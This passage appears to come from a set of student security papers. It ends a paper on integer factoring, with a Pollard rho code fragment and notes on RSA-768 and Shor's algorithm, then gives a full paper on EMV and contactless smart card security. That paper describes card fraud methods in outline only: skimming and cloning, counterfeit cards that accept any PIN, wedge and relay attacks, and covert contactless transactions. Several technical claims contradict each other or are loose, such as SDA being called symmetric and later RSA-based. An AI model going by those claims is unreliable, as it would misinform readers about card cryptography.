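            x = f(x)
            y = f(f(y))
            prod = (prod * abs(x - y)) % n
        g = gcd(prod, n)
        if g == 1:
            continue          # no factor in this batch, keep going
        if g < n:
            return g          # a non-trivial factor of n
        # g == n: replay the batch step by step to isolate the factor
        x, y = xs, ys
        for _ in range(batch):
            x = f(x)
            y = f(f(y))
            g = gcd(abs(x - y), n)
            if 1 < g < n:
                return g
        return n              # failure (e.g. n prime); retry with another f
```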
6.5 Other Algorithms
All the presented algorithms are so-called special-purpose factoring
algorithms. This means that their running time does not depend solely on the
size of the integer to be factored: the actual running time may depend on the
size of the number's factors (trivial, Fermat, Pollard's ρ), algebraic
properties (Pollard's p − 1), or other properties. Elliptic curve factorization
is another well-known sub-exponential special-purpose factoring algorithm [15].
Conversely, the running time of general-purpose factorization algorithms
depends solely on the size of the integer to be factored. These algorithms are
the ones used in practice when trying to factor integers from RSA
cryptosystems. The general number field sieve is currently the fastest
algorithm in this category for factoring large integers (typically above 100
digits).
7 Conclusion
7.1 Current State of the Art
In 2009, a team of researchers managed to factor a 768-bit number (232 digits),
using a cluster of many hundreds of computers over two years [16]. The number
was known as RSA-768 and had been proposed by RSA Laboratories as part of a
challenge; however, the challenge was cancelled in 2007. It is still today the
largest RSA number factored. Though this number was factorized, the security of
RSA systems is not compromised, as it would take the same amount of time to
factor any other number of that size used for RSA. Moreover, the recommended
size of numbers used for RSA increases with time.
7.2 Peek at the Future
With the emergence of quantum computers, integer factorization could become
a much simpler problem. In fact, there already exists an algorithm, running in
polynomial time on a quantum computer, that computes the prime factors of any
given number: Shor's algorithm [17].
In 2001, the number 15 was factored on a quantum computer using Shor's
algorithm by researchers from IBM Almaden and Stanford University [18].
Factoring such a small number might seem a derisory achievement, but it is in
fact a major milestone in the field: it proves the feasibility of quantum
computers and Shor's algorithm in practice. If researchers find a way to
increase the scalability of quantum computers, the end of most cryptosystems
such as RSA would be inevitable.
7.3 Final Words
As we have seen throughout this report, integer factorization is a very
interesting problem of great importance in various fields such as cryptography
and complexity theory. It is also a perfect problem for quantum computers to
work on. But most of all, the problem has practical, real-life implications:
any efficient way to compute the prime factors of a huge number would have
gigantic effects, as a huge number of systems rely on the difficulty of
factoring big numbers for their security!
References
1. Oystein Ore. Number Theory and Its History. Courier Dover Publications, 1988.
2. G. Bisson. Factorisation d’entiers, 2011.
3. Kenneth H. Rosen. Discrete mathematics and its applications. McGraw-Hill,
Boston, 5th edition, 2003.
4. Joseph J. Rotman. First Course in Abstract Algebra. Prentice Hall, 2005.
5. N. Bourbaki. Éléments d’histoire des mathématiques. Masson, 1984.
6. S. Büttcher. Cryptography and security of open systems, factorization of large
integers. Ferienakademie, 2001.
7. W. Stein. Elementary number theory: Primes, congruences, and secrets. 2011.
8. Michael Sipser. Introduction to the Theory of Computation. Course Technology,
2005.
9. Alan Cobham. The intrinsic computational difficulty of functions. In Y. Bar-Hillel,
editor, Logic, Methodology and Philosophy of Science, proceedings of the second
International Congress, held in Jerusalem, 1964. North-Holland, Amsterdam, 1965.
10. Manindra Agrawal, Neeraj Kayal, and Nitin Saxena. PRIMES is in P. Annals of
Mathematics, 160(2):781–793, 2004.
11. John D. Lipson. Newton’s method: a great algebraic algorithm. In Proceedings of
the third ACM symposium on Symbolic and algebraic computation, SYMSAC ’76,
pages 260–270, New York, NY, USA, 1976. ACM.
12. R. Lehman. Factoring large integers. Mathematics of Computation, 1974.
13. B. Luders. An analysis of the complexity of the pollard rho factorization method.
2005.
14. R. P. Brent. An improved Monte Carlo factorization algorithm. 1980.
15. H. W. Lenstra Jr. Factoring integers with elliptic curves. The Annals of Mathematics, 1987.
16. Thorsten Kleinjung, Kazumaro Aoki, Jens Franke, Arjen Lenstra, Emmanuel
Thomé, Joppe Bos, Pierrick Gaudry, Alexander Kruppa, Peter Montgomery,
Dag Arne Osvik, Herman te Riele, Andrey Timofeev, and Paul Zimmermann. Factorization of a 768-bit RSA modulus. Cryptology ePrint Archive, Report 2010/006,
2010.
17. Peter W. Shor. Algorithms for quantum computation: Discrete logarithms and
factoring. In FOCS, pages 124–134. IEEE Computer Society, 1994.
18. Lieven M. K. Vandersypen, M. Steffen, G. Breyta, C. S. Yannoni, M. H. Sherwood,
and I. L. Chuang. Experimental realization of Shor’s quantum factoring algorithm
using nuclear magnetic resonance. Nature, 414(quant-ph/0112176):883–887, 2001.
Smart Card Security: A Study into the Underlying
Techniques Deployed in Smart Cards
Clement Tan, Qi Lin Ho, Soo Ming Poh
Abstract. This paper explores the techniques used in smart cards, broadly
categorized into contact smart cards and contactless smart cards. For each
technique, the underlying methods are outlined and their strengths and
weaknesses evaluated. Potential threats to smart cards are also discussed,
together with the solutions provided to counter these security issues. The
paper concludes by investigating the possible future of smart cards and the
upcoming technology of Near Field Communication.
1 Introduction
The smart card has been one of the most remarkable inventions in the Information
Technology (IT) sphere. The smart card was first invented in 1968 and first saw
commercial use in France in 1983, as a telephone card for payment at public pay
phones [1]. After the successful mass use of the cards, the memory concept was
incorporated into them. More research was then performed, and this led to the
development of microprocessor smart cards.
Smart cards can be categorized along two general axes: (1) memory versus
microprocessor; (2) contact versus contactless. In the former category, memory
smart cards only store data, while microprocessor smart cards not only store
data but also allow the addition, deletion and modification of data stored
within the memory. In the latter category, physical interaction with card
readers/terminals is required for contact smart cards to work. On the other
hand, contactless smart cards eliminate the need for physical contact with the
terminal, thanks to an embedded antenna within the card which allows
communication to take place.
Due to the many benefits smart cards have brought to people, including
convenience and ease of use, their popularity has been increasing tremendously.
At present, smart cards are used in application areas such as: (1) finance,
e.g. credit cards, debit cards; (2) mass transit, e.g. EZ-Link cards; (3)
identification, e.g. biometric cards; (4) healthcare, e.g. health insurance
cards; (5) telecommunications, e.g. SIM (Subscriber Identification Module)
cards.
This paper focuses mainly on contact and contactless smart cards. The rest of
the paper is organized as follows: the next section introduces contact and
contactless smart cards, their underlying security techniques and associated
potential threats. Section 3 compares the security techniques. Section 4
discusses the future of smart cards, and the paper finally concludes in
Section 5.
2 Contact Smart Cards
Contact smart cards are cards embedded with an integrated circuit chip (ICC)
that contains either memory alone or memory combined with a microprocessor. As
the name suggests, contact smart cards have to be inserted into a smart card
reader in order to establish a direct connection for the transfer of data [2].
Contact smart cards can be identified by a small yet obvious gold connector
plate, measuring approximately one square centimetre, located at a corner of
the card. Some examples of contact smart cards include cash cards, credit
cards, debit cards and even the SIM (Subscriber Identification Module) cards
used in mobile phones.
2.1 Security Techniques Implemented in Contact Smart Cards
EMV (Europay, MasterCard and VISA) technology sets the specifications
established to support the replacement of the magnetic strip with chip
technology on contact smart cards. With the introduction of the EMV
specifications, global interoperability can be assured between contact smart
cards and card readers [3]. More importantly, EMV also enhances the security
level in three main areas of concern in a contact smart card transaction: card
authentication, cardholder verification and transaction authorization [4].
Card Authentication. To prove the genuineness of contact smart cards and
enhance protection against counterfeits, three techniques are available:
Static Data Authentication (SDA), Dynamic Data Authentication (DDA) and
Combined DDA with Application Cryptogram Generation (CDA). During a payment
transaction, the card chip and the terminal agree to perform either SDA, DDA
or CDA; only one method of offline data authentication is performed for a
particular transaction.
Static Data Authentication. SDA makes use of a symmetric key encryption
technique whereby both the card and the bank share the same secret key. This
key is required to verify the Cryptographic Check Value (CCV) stored in the
card during personalization [5]. It must be noted that the card is only
verified once the bank confirms it. The issue with SDA is that the card can
only be proven genuine if the terminal is online. In the case of an offline
terminal, the card cannot be validated straight away: the offline terminal
only records the response provided by the card during authorization and sends
it to the bank when there is a connection. With this shortcoming, SDA chip
cards are at a disadvantage, since they are perceived to be even less secure
than magnetic strip cards if an offline terminal is used (i.e. one that will
never have any connection).
Dynamic Data Authentication. DDA is a more secure technique than SDA. Instead
of utilizing a single shared secret key, DDA stores an encryption key which
allows for offline data authentication: the card uses public key technology to
generate a cryptographic value, which includes transaction-specific data
elements, that is validated by the terminal to protect against skimming [6], a
feature SDA is unable to provide. In addition, the card generates a new
cryptographic value each time a new transaction is performed. Therefore, DDA
is perceived to be a stronger form of card authentication, since attackers
cannot acquire the private key on the chip card just by reading the card [7].
Combined DDA with Application Cryptogram Generation. CDA combines the
underlying techniques of both SDA and DDA. When CDA is used, not only can the
genuineness of the card be validated, but it can also be determined whether
data within the card has been altered since personalization. In this way, the
malicious act of programming offline terminals through the use of counterfeit
cards can be avoided [8].
Essentially, all three techniques for card authentication employ RSA (Rivest,
Shamir, and Adleman) public key cryptography.
Card Verification. To prove the genuineness of owners and protect against lost
and/or stolen cards, four types of cardholder verification methods (CVM) are
used: Online PIN, Offline PIN, Signature and No CVM Required.
Online PIN. With this verification technique, users enter their PIN, which is
encrypted with the Triple Data Encryption Standard (3DES) and then transported
to the issuer, the bank, for verification purposes [9].
Offline PIN. In the case of offline PIN, the PIN entered by the user is
compared with the pre-assigned PIN value stored in the card. In addition, an
offline counter blocks the offline PIN after a certain number of incorrect PIN
attempts [10].
Signature. Cardholders are required to physically provide a signature in order
to prove that they are the genuine owner. An advantage of using a signature as
a form of verification is that signatures are somewhat difficult to forge;
however, this does not mean there are no cases of signature forgery. On the
other hand, this verification method requires a human to be present to compare
the signature with the one on the card to determine its genuineness [11].
No CVM Required. This can be said to be the most dangerous verification method,
since if no CVM is required, there is effectively no verification process at
all. The only advantage of this method is the speed of transactions [12].
Transaction Authorization. To prove that a transaction is genuinely initiated
by the user, the transaction needs to be authorized by that user. The process,
Online Mutual Authentication (OMA), uses an Authorization Request Cryptogram
(ARQC) and an Authorization Response Cryptogram (ARPC). The contact smart card
produces an ARQC, passed via the terminal, i.e. the card reader, to the issuer
(bank) when a transaction is initiated. Only when verification is successful
will the issuer return an ARPC to the card. The card then returns a Transaction
Certificate to proceed with the transaction.
3 Contactless Smart Cards
Contactless smart cards employ a radio frequency link between the Proximity IC
Card (PICC) and the Proximity Coupling Device (PCD), without physical insertion
of the card into the reader. As seen in Fig. 1, this is made possible because
the PICC contains an integrated chip and an inductive antenna coil embedded
within the card. An alternating current passes through the PCD antenna and
creates an electromagnetic field, which induces a current in the PICC antenna.
The PICC then converts this induced current into a DC voltage to power the
PICC's internal circuits. The maximum proximity distance possible for
transmission is determined by the configuration and tuning of both antennas in
the PICC and PCD.
Fig. 1. PCD and PICC Configuration
These contactless smart cards are used in situations where quick transactions
are necessary, or whenever the cardholder is in motion at the moment of the
transaction. Many contactless readers are designed specifically for cashless
payment, physical access control, identification systems and transportation
applications [13].
3.1 Security Techniques Implemented
Triple Data Encryption Standard. Triple DES takes three 64-bit keys, for an
overall key length of 192 bits. The implementation breaks the user-provided key
into three subkeys, padding the keys if necessary so that each is 64 bits long.
The data is encrypted with the first key, decrypted with the second key, and
finally encrypted again with the third key. Triple DES runs three times slower
than standard DES, but is much more secure if used properly. The procedure for
decryption is the same as the procedure for encryption, except that it is
executed in reverse. Like DES, data is encrypted and decrypted in 64-bit
blocks [14].
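The encrypt-decrypt-encrypt (EDE) structure can be illustrated with a toy sketch (our own; a single-byte XOR stands in for the DES block cipher purely to show the keying pattern, and is of course not a real cipher):

```python
def toy_encrypt(block, key):
    # Stand-in "cipher": XOR every byte with a one-byte key (NOT real DES).
    return bytes(b ^ key for b in block)

def toy_decrypt(block, key):
    return bytes(b ^ key for b in block)  # XOR is its own inverse

def triple_ede_encrypt(block, k1, k2, k3):
    # Triple DES EDE: encrypt with k1, decrypt with k2, encrypt with k3.
    return toy_encrypt(toy_decrypt(toy_encrypt(block, k1), k2), k3)

def triple_ede_decrypt(block, k1, k2, k3):
    # Decryption runs the same three steps in reverse order.
    return toy_decrypt(toy_encrypt(toy_decrypt(block, k3), k2), k1)
```

Note that setting k1 = k2 makes the first two steps cancel out, leaving a single encryption under k3; this is how the EDE arrangement stays backward compatible with single DES.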
Advanced Encryption Standard. AES is a symmetric block cipher that encrypts and
decrypts 128-bit blocks of data. The algorithm consists of 4 stages that make
up a round, which is iterated 10 times for a 128-bit key. The first stage, the
"SubBytes" transformation, is a non-linear byte substitution applied to each
byte of the block. The second stage, the "ShiftRows" transformation, cyclically
shifts (permutes) the bytes within the rows of the block. The third stage, the
"MixColumns" transformation, groups 4 bytes together to form 4-term polynomials
and multiplies them by a fixed polynomial modulo (x⁴ + 1). The fourth stage,
the "AddRoundKey" transformation, adds the round key to the block of data [15].
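The ShiftRows stage is simple enough to sketch directly (our own illustration, viewing the 128-bit state as four rows of four bytes; row r is rotated left by r positions):

```python
def shift_rows(state):
    # state: four rows of four bytes; row r is cyclically shifted left by r.
    return [row[r:] + row[:r] for r, row in enumerate(state)]
```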
RSA Signature. RSA is a public key cryptosystem for both encryption and
authentication. It is an encryption algorithm that uses very large prime
numbers to generate the public and private keys. RSA is typically used in
conjunction with a secret key cryptosystem such as DES: DES is used to encrypt
the message as a whole, and RSA is then used to encrypt the secret key [16].
Elliptic Curve Cryptography (ECC). ECC is a form of public key cryptography.
The "domain parameters" in ECC are predefined constants known to all the
devices taking part in the communication between sender and receiver. ECC does
not require any shared secret between the communicating parties, but it is much
slower than private key cryptography. The mathematical operations of ECC are
defined over the elliptic curve y² = x³ + ax + b, where 4a³ + 27b² ≠ 0. Each
value of 'a' and 'b' gives a different elliptic curve. The private key is a
random number, and the public key is a point on the curve, obtained by
multiplying the private key by the generator point G on the curve. The
generator point G, the curve parameters 'a' and 'b', together with a few more
constants, constitute the domain parameters of ECC [17].
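A minimal sketch of this key derivation follows (our own illustrative code, over a toy curve y² = x³ + 2x + 3 mod 97 that is far too small for real use; the generator G = (3, 6) is chosen to lie on this curve):

```python
p, a, b = 97, 2, 3   # toy domain parameters
G = (3, 6)           # generator point on y^2 = x^3 + ax + b (mod p)

def ec_add(P, Q):
    # Group law on the curve; None stands for the point at infinity.
    if P is None: return Q
    if Q is None: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None  # P + (-P) = infinity
    if P == Q:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p  # tangent slope
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p         # chord slope
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def scalar_mult(k, P):
    # Double-and-add: the public key is private_key * G.
    R = None
    while k:
        if k & 1:
            R = ec_add(R, P)
        P = ec_add(P, P)
        k >>= 1
    return R

private_key = 20                          # a random number
public_key = scalar_mult(private_key, G)  # a point on the curve
```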
4 Comparison across Smart Card Security Techniques
4.1 Evaluation of Security Techniques in Contact Smart Cards
In this section, the security techniques employed in contact smart cards are
analysed. The analysis covers the strengths (i.e. benefits) and weaknesses
(i.e. potential threats) of each underlying technique. In addition, suggested
solutions or mitigations are provided.
Card Authentication.
Static Data Authentication. The main reason SDA is used in the card
authentication process is its low implementation cost: it is generally much
cheaper to deploy SDA than DDA, because SDA does not require public key
cryptographic processing. Without this process, there is no need to use cards
that come with a public key cryptographic processor, hence the lower cost [18].
As the saying goes, 'you get what you pay for': with a cheaper technique, there
are bound to be weaknesses. As mentioned earlier, SDA requires a terminal that
is online in order to validate the genuineness of the card. An attacker can
launch an attack simply by making use of an offline terminal. For example, an
attacker skims/clones a genuine card to produce a counterfeit card for use on
an offline terminal. All he needs to do is program the card in such a way that
it will accept whatever PIN he enters [19], and the transaction, or rather the
attack, will be successful.
Skimming and Cloning. Information on a card can be recorded when a user uses
his card on a machine with a skimming device attached, while the PIN entered
is captured with a separate capturing device. The unauthorized user can then
duplicate the card by cloning all its information. Since the unauthorized user
now has a cloned card and the PIN, he will be able to authorize any
transactions.
To lower the risk of skimming and cloning leading to the production and use of
counterfeit cards, additional properties such as data locking and tamper
resistance can be included. With the former, data within the card is locked so
that an attacker cannot retrieve it. With the latter, data within the card is
encrypted so that even if attackers find ways of retrieving the data, they
will not be able to decipher it. In this way, the card is much more secure.
Dynamic Data Authentication. As one of the means to mitigate the threat faced
by SDA, Dynamic Data Authentication is used. As mentioned in the previous
section, the combination of an encryption key with public key technology makes
DDA a more secure authentication method, since card data can be authenticated
and validated. DDA also includes additional security features, such as secure
key storage and tamper resistance, which prevent the counterfeiting of cards
[20]. However, these additional security features require cards integrated
with a public key cryptographic processor, which explains the higher cost of
dynamic data authentication compared to static data authentication. In
addition, DDA is not foolproof: a 'wedge' attack is also possible. Since card
authentication takes place before PIN verification, a stolen card can be
exploited without knowing the correct PIN [21]. As shown in Fig. 2 below, an
electronic device acting as a 'man-in-the-middle', or 'wedge', can manipulate
the messages flowing between the terminal and the card, interfering with the
cardholder verification process.
Fig. 2. Variation of a Man-in-the-Middle Attack/“Wedge” Attack on a Contact Smart Card [22]
A suggested solution is to allow the card authentication and card verification processes to take place simultaneously, which moderates the risk of a "wedge" attack. It will be seen later that another authentication method, Combined DDA with Application Cryptogram Generation, is able to perform this function.
Combined DDA with Application Cryptogram Generation. Faced with the threat of the "wedge" attack on the DDA technique, a later variant of card authentication, CDA, was introduced. CDA partially solves the issues faced by DDA, since it performs card authentication and PIN verification at the same time. However, due to its lack of interoperability (it may not work with older terminals), CDA has not become as popular as DDA [23]. CDA is considered a very secure authentication method, so its interoperability issues should be addressed to encourage wider adoption.
Card Verification.
Online PIN Verification. The online PIN method offers a high level of security because the PIN is encrypted with Triple DES when transported to the issuer for verification. With the issuer performing the verification, card verification can be achieved with minimal threat.
Offline PIN Verification. This method of card verification provides a high level of security because the card contains an offline counter that blocks the use of the offline PIN after a certain number of incorrect PIN attempts. As illustrated in Fig. 3, the chip decreases the PIN Try Counter by one each time an incorrect PIN is entered. When the counter reaches zero, the card is blocked and the user must go to the issuer to re-activate it. This protection can also be a double-edged sword: if a genuine cardholder forgets his PIN, the blocking of the card becomes an annoyance, since he must re-activate the card in order to use it.
Fig. 3. Offline PIN Verification Process [24]
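The PIN Try Counter behaviour described above can be sketched as follows. This is a minimal illustration, not EMV-specified behaviour: the class and method names are our own, and the reset-on-success rule is an assumption.

```python
# Minimal sketch of the offline PIN Try Counter logic described above.
# Names and the reset-on-success behaviour are illustrative assumptions.

class CardPinVerifier:
    def __init__(self, correct_pin: str, max_tries: int = 3):
        self.correct_pin = correct_pin
        self.pin_try_counter = max_tries  # decremented on each wrong attempt

    def verify(self, pin: str) -> str:
        if self.pin_try_counter == 0:
            return "BLOCKED"          # card must be re-activated by the issuer
        if pin == self.correct_pin:
            self.pin_try_counter = 3  # assumed: counter resets on success
            return "OK"
        self.pin_try_counter -= 1
        return "BLOCKED" if self.pin_try_counter == 0 else "WRONG_PIN"

card = CardPinVerifier("4921")
print(card.verify("0000"))  # WRONG_PIN
print(card.verify("1111"))  # WRONG_PIN
print(card.verify("2222"))  # BLOCKED (counter reached zero)
print(card.verify("4921"))  # BLOCKED (even the correct PIN is now refused)
```

The last call shows the double-edged sword: once blocked, even the genuine PIN is refused until the issuer re-activates the card.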
Signature. This method of card verification is easy for users. Apart from eliminating the need to remember PINs (assuming each card is given a different PIN), a signature is very personal: only the genuine owner knows the exact way of signing it. However, forging a signature is not impossible. Since the signature appears on the back of the card, anyone who picks up a signed card can learn to forge it. On top of that, merchants often do not check the signature given against the one on the card. This places the signature verification method at higher risk in terms of security.
PIN and signature verification methods do have their own advantages, but both carry inevitable threats. The former is prone to "PIN stealing": a PIN entered at a terminal can be observed by "shoulder surfing". The latter, as mentioned, is prone to forgery. As a result, both PIN and signature verification can be seen as insecure. One article reports that 63% of consumers would prefer fingerprint verification over PIN and signature [25]. In the future, fingerprint verification may take over from the other verification methods. This is highly feasible, since a fingerprint is a form of biometric capable of identifying an individual, and no two persons have identical fingerprints. In this way, an even higher level of security can be reached, eliminating the threats of "PIN stealing" and forgery.
EMV Technology as a Whole. The above provides specific analysis of individual security techniques. As we can see, EMV technology is considered highly secure. However, EMV is still not foolproof. A prominent example of a potential threat faced by contact smart cards is the middleperson attack (relay attack).
Middleperson Attack (Relay Attack) [26]. Suppose you are at a restaurant having lunch. At the end of the meal, you pay $50 with your VISA card. However, at the end of the month, you find that you have paid $500 instead of the $50 for the meal. What actually happened?
Fig. 4. Man-in-the-Middle Attack on a Contact Smart Card [27]
The above example is one form of middleperson attack, or relay attack. The Point of Sale (POS) terminal used to make the payment has been tampered with. Just as you were about to enter your PIN on the POS terminal, the waiter at the restaurant informed his accomplice to get ready for the "attack". The accomplice first inserts a fake card into a POS terminal at another store. As soon as you enter your PIN, it is transmitted wirelessly to the fake card and the accomplice, who then enters the PIN he has received, and the attack succeeds. The attackers have just used your account to pay for their items at another store.
4.2 Evaluation of Security Techniques in Contactless Smart Cards
In this section, we analyze the security techniques employed in contactless smart cards, covering the strengths (i.e. benefits) and weaknesses (i.e. potential threats) specific to the contactless smart card technology. In addition, suggested solutions or mitigations are provided.
Potential Threats of Contactless Smart Cards [28]. The main difference between contact and contactless smart cards lies in how information is transmitted between the card and the reader. A contactless smart card does not need to be inserted into, or be in direct contact with, the reader. The over-the-air transmission of data creates opportunities for threats specific to contactless smart cards.
Eavesdropping. The absence of a physical connection between a contactless smart card and the reader makes it convenient and easy to intercept, and even change, data transmitted over the air. Eavesdropping is a common threat that exploits this largest weakness of contactless information transmission. In the passive setting, a hacker may learn useful or confidential information by triggering a response from the card at a distance, with the user unaware of it. In the active setting, man-in-the-middle attacks are facilitated: a hacker can replace blocks of data in transit with blocks of his choosing. For these reasons, encryption of the data being exchanged and mutual authentication are compulsory in most cases.
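The mutual authentication called for above can be sketched as a symmetric challenge-response exchange. This is only an illustration of the principle: HMAC-SHA256 stands in for whatever cipher a real card would use, and the key and nonces are invented for the example.

```python
import hmac
import hashlib
import os

# Illustrative challenge-response mutual authentication between a reader and
# a card that share a symmetric key. Real contactless protocols differ in
# detail; HMAC-SHA256 here stands in for the card's actual cipher.

KEY = b"shared-secret-provisioned-in-card"  # hypothetical shared key

def respond(key: bytes, challenge: bytes) -> bytes:
    """Answer a challenge by MACing it with the shared key."""
    return hmac.new(key, challenge, hashlib.sha256).digest()

# Reader authenticates the card: only a party holding KEY can answer.
reader_nonce = os.urandom(16)
card_answer = respond(KEY, reader_nonce)          # computed on the card
assert hmac.compare_digest(card_answer, respond(KEY, reader_nonce))

# Card authenticates the reader with its own fresh nonce, so a recorded
# answer cannot be replayed.
card_nonce = os.urandom(16)
reader_answer = respond(KEY, card_nonce)
assert hmac.compare_digest(reader_answer, respond(KEY, card_nonce))
print("mutual authentication succeeded")
```

Fresh random nonces on both sides are what prevent a passive eavesdropper from replaying an old exchange.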
Interruption of Operations. The other threat contactless smart cards face is interruption of operations. Because a contactless card operates within the reader's electromagnetic field, data transmission may be interrupted at any moment: the user may move his card out of the field without even realizing it. The system therefore needs to ensure that transactions complete successfully without any miscommunication of data. Reliable backup mechanisms need to be implemented, and back-dated data should be available whenever possible.
Denial of Service. This type of attack, common in computer networks, can also occur with contactless smart cards. It can be carried out by the owner of the card, or by hackers in close proximity. The former occurs when users, for some reason, want to redeem a new functional card from the issuer free of charge. The latter occurs when monetary units are debited from the card at close proximity, denying the user access to the service he has paid for. The information within a contactless smart card can also be deleted or completely destroyed using inappropriate electromagnetic waves.
Covert Transactions. The most important difference between contact and contactless smart cards is that the user does not notice when a fake reader enters into communication with the card he is holding. The biggest threat for contactless technology is therefore covert transactions, in which fraudulent merchants communicate with the user's card and trigger fake transactions using fake readers. Such merchants could process many transactions of small amounts, or even debit all monetary units on the card from a distance. A sound approach to protect against this attack is strong mutual authentication between the card, the reader and the user, possibly relying on certificates and requiring some kind of user interaction. For example, a user could be prompted to push a button on his card, or apply some similar mechanism, whenever a transaction is performed. In any case, the system must help the user accept only legitimate transactions.
Other Types of Attacks. Other threats include physical attacks on the chip hardware, for example by microelectronic probing, as well as so-called side-channel attacks, in which the opponent simply monitors the electrical activity of the chip and tries to turn seemingly unrelated power, timing or electromagnetic emanation measurements into meaningful information. New side-channel attacks targeting contactless technology have recently emerged, and they have proven quite successful at recovering secret information from the card with very limited resources when no specific countermeasures are implemented.
Security in 3DES. The 3DES algorithm is used to calculate Cryptographic Check Values (CCVs). The primary purpose of the CCV is to provide a data integrity function ensuring that the message has not been manipulated in any way, covering alteration, addition and deletion of data. Essential security for smart card data transmission is achieved through sequence numbers incorporated within the CCV. The CCV also supplies some assurance of source authentication, depending on the key management architecture. However, the CCV does not provide non-repudiation: it is almost impossible to prove to a third party that a message is authentic, because the receiver holds the same secret key as the sender and is therefore able to create a new message or modify an existing one [29].
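A minimal sketch of such a CCV, including the sequence number, follows. Python's standard library has no 3DES, so HMAC-SHA256 stands in for the 3DES-based MAC; the key, message and field layout are illustrative assumptions, not the actual smart card format.

```python
import hmac
import hashlib

# Sketch of a Cryptographic Check Value (CCV) providing integrity plus
# replay protection via a sequence number. HMAC-SHA256 stands in for the
# real 3DES-based MAC; all names and values here are illustrative.

KEY = b"issuer-shared-key"  # hypothetical key shared by sender and receiver

def ccv(key: bytes, seq: int, message: bytes) -> bytes:
    # The sequence number is MACed together with the message, so replayed
    # or reordered messages fail verification.
    data = seq.to_bytes(4, "big") + message
    return hmac.new(key, data, hashlib.sha256).digest()

msg = b"DEBIT 50.00 SGD"
tag = ccv(KEY, seq=7, message=msg)

assert hmac.compare_digest(tag, ccv(KEY, 7, msg))                      # accepted
assert not hmac.compare_digest(tag, ccv(KEY, 8, msg))                  # wrong sequence
assert not hmac.compare_digest(tag, ccv(KEY, 7, b"DEBIT 500.00 SGD"))  # altered data
```

Note that anyone holding KEY can compute a valid tag, which is exactly why such a symmetric CCV cannot provide non-repudiation.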
Security in RSA. It is relatively easy to generate an apparently authentic copy of a digital signature when no evidence is present to prove the authenticity of the signature. Source authenticity and non-repudiation cannot be checked if the authenticity of the keys cannot be proven. Additional steps are therefore needed to assure the authenticity of the sender's public key [30].
5 Related Work: Future of Smart Cards
5.1 More Extensive Use of Smart Cards in Various Industries and Practices
Smart cards are now integrated into our daily lives: we rely heavily on the technology to pay transport fares, enter our offices, access our computers at work and even get a snack from the vending machine.
Consumer research has revealed that nearly 80 percent of consumers surveyed believe that smart cards will be an important part of their everyday life, and more than three-quarters are strongly attracted to smart cards that consolidate payment functions and store personal data on the same card. Smart cards also have the potential to become lifestyle cards, holding a range of applications chosen by the cardholder [31].
Most smart card systems in use today serve only a single purpose, tied to one process or hardwired to one application. A smart card can hardly justify its existence in this form, so the future approach is to design multi-application cards with an operating system based on an open standard that can perform a variety of functions [32].
At the Personal Level. At the personal level, in the near future we foresee smart cards becoming configurable and able to handle multiple tasks selected by their owners: providing access to company networks, enabling electronic commerce, storing personal health records, providing ticketless airline travel and car rentals, and offering electronic identification for accessing government services, to name a few [33]. The ultimate goal is to carry fewer cards while gaining greater convenience and faster access to a wide array of information.
At the Corporate Level. At the corporate level, too, there is a growing trend of companies and corporations across various industries adopting smart card and card reader systems.
For instance, hospitals use smart card technology to ensure more timely and secure dispensing of medicine to patients. A medicine cabinet is fitted with reader technology and wirelessly connected to software that links to personal dosage information stored on an RFID wristband. If a patient is required to take one tablet at six o'clock in the morning, the software communicates with the cabinet to indicate that the patient needs to access his medicine. The patient then presents his wristband to the cabinet reader, gaining access to his prescribed medication at the correct time [34].
Smart card technology is also getting attention from the fleet management sector, where RFID is already being installed in rental cars. The idea is that a rental car can be parked on a street corner and accessed simply by presenting an RFID-enabled card to a reader installed inside the windscreen. HID Global, a provider of access control and secure identity solutions, including secure card issuance and RFID technology, is working with major car rental companies interested in leveraging this technology to streamline the management of their fleets [35].
5.2 Possibility of Replacement by NFC-Enabled Smart Phone Devices
With a wide and growing number of industries finding uses for smart cards, coupled with the increasing popularity and adoption of smart phones, there is a strong possibility of integrating smart card functionalities into smart phones. This would fulfill the requirements of a multi-function smart card while removing the need for another physical card containing a microprocessor chip.
At least in the local context, such a scenario may soon become reality: consumers here will be allowed to tap and pay for their purchases at more than 20,000 retail points and in taxis from the middle of 2012 using Near Field Communication (NFC) technology on a smart phone.
NFC is a short-range wireless communication technology capable of bidirectional
data transfer which allows mobile phones and NFC readers to communicate and
conclude transactions within a 4-cm distance, operating in the HF frequency band at
13.56 MHz [36].
When launched in 2012, the deployment focus of NFC technology will be retail payment, but it will be extended to loyalty schemes, ticketing and gift vouchers within two years. Discussions will be held with the Land Transport Authority to plan the rollout of NFC mobile payment for transit in early 2013 [37]. Merchants need not install new devices to accept mobile payment from NFC phones; those that currently accept contactless payment cards from MasterCard, Visa or CEPAS will be able to use the same device to accept such payments [38]. Such systems are already in use in parts of Europe and Asia, such as South Korea and Japan.
6 Conclusion
The use of smart cards has provided convenience and ease of use to many individuals and entities. But as discussed in this paper, there are several security concerns and potential threats that users and developers must be aware of. Developers must guard smart card systems against attacks from hackers using security measures such as cryptographic algorithms, digital signatures and key management, which provide authentication, data integrity, confidentiality and non-repudiation.
In contact smart card technology, card authentication, card verification and transaction authorization are of utmost importance, as these are the areas hackers are most likely to attack. Measures such as Static Data Authentication, Dynamic Data Authentication and Combined DDA with Application Cryptogram Generation are used for card authentication. Password-related mechanisms such as PINs and signatures are required for card verification. Lastly, for transaction authorization, authorization request and response cryptograms are implemented to ensure that transactions are genuine and complete successfully.
Because contactless smart card technology transmits information without a physical medium, securing the transmission process is critical for protecting the user; it creates opportunities for threats such as eavesdropping, denial of service and covert transactions. Developers have the responsibility to prevent these attacks with the various security mechanisms described previously.
With the pervasive use of smart cards in many aspects of our lives, smart cards have become a necessity that provides extensive convenience. We foresee smart cards becoming configurable and able to handle multiple tasks selected by their users. Many industries and companies have taken smart cards to new levels, including incorporating them into medicine dispensers and rental car access. Lastly, there is the new possibility of integrating smart card functionalities into smart phones using Near Field Communication, the motivation being that a single smart phone can replicate the capabilities of numerous smart cards. This upcoming technology could pose a substantial threat to smart cards and motivate future studies into the security principles, techniques and issues of NFC.
References
1. Smart card: Invented here, http://www.nytimes.com/2005/08/09/world/europe/09ihtcard.html
